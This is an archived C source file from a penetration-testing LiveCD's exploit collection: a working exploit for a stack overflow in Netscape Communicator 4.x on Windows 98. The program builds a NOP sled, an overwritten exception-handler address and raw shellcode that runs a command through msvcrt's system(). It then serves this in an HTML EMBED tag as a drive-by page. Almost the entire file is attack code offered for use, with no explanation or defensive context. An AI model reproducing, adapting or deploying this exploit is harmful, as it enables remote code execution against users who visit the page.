home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / Netscape / netscape4-ex.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  84 lines

---

1. /************************************************************************/
2. /*    Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98   */
3. /*                                                */
4. /*                    written by R00t Zer0(defcon0@ugtop.com)    */
5. /*                                                */
6. /*          DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm)    */
7. /************************************************************************/
8.  
9. #include <stdio.h>
10. #include <stdlib.h>
11. #include <string.h>
12. #include <time.h>
13. #include <sys/types.h>
14. #include <sys/stat.h>
15.  
16. #define    STACK_LEN        ( 2135 )
17. #define    EMBED_TYPE_LEN    ( 150 )
18. #define    XPT_HDL_OFFSET    ( 588 )
19. #define    JMPS_OFFSET        ( 6 )
20. #define    JMP_EBX_ADDR    ( 0xbff7a06b )
21. #define    INT01H_ADDR        ( 0xbff73d30 )
22. #define    NOP_CODE        ( 0x90 )
23. #define    JMPS_CODE        ( 0xeb )
24. #define    FUNCTION        "msvcrt.dll.system.exit."
25. #define    COMMAND            "welcome.exe"
26. #define    CMDLENP            ( 65 )
27.  
28.  
29. int
30. main( void )
31. {
32.   u_char win98_exec_code[100] = {
33.     0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
34.     0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
35.     0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
36.     0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
37.     0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
38.     0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
39.  
40.   u_char    exploit_code[ STACK_LEN ];
41.   u_char    embed_type[ EMBED_TYPE_LEN ];
42.   u_long    ip;
43.   int        loop;
44.  
45.   srand( ( u_int )time( 0 ) );
46.  
47.   bzero( exploit_code, sizeof( exploit_code ) );
48.   for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
49.     exploit_code [loop ] = NOP_CODE;
50.  
51.   /* make exploit code */
52.   ip = JMP_EBX_ADDR;
53.   exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
54.   exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
55.   exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char)( 0xff & ( ip >> 24 ) );
56.   exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char)( 0xff & ( ip >> 16 ) );
57.   exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char)( 0xff & ( ip >> 8  ) );
58.   exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char)( 0xff & ( ip >> 0  ) );
59.  
60.   win98_exec_code[ CMDLENP ] = strlen( COMMAND );
61.   strcat( exploit_code, win98_exec_code );
62.   strcat( exploit_code, FUNCTION );
63.   strcat( exploit_code, COMMAND );
64.  
65.  
66.   /* set random type */
67.   for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
68.     embed_type[ loop ] = 0x23 + ( rand() % 93 );
69.  
70.   /* print html */
71.   printf( "Content-type: text/html\n\n" );
72.   printf( "<HTML>\n" );
73.   printf( "<HEAD>\n" );
74.   printf( "    <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
75.   printf( "</HEAD>\n" );
76.   printf( "<BODY>\n" );
77.  
78.   printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", exploit_code );
79.   printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", embed_type  );
80.   printf( "</EMBED>\n</BODY>\n</HTML>\n" );
81.  
82.   return( 0 );
83. }
84. /*                    www.hack.co.za              [2000]*/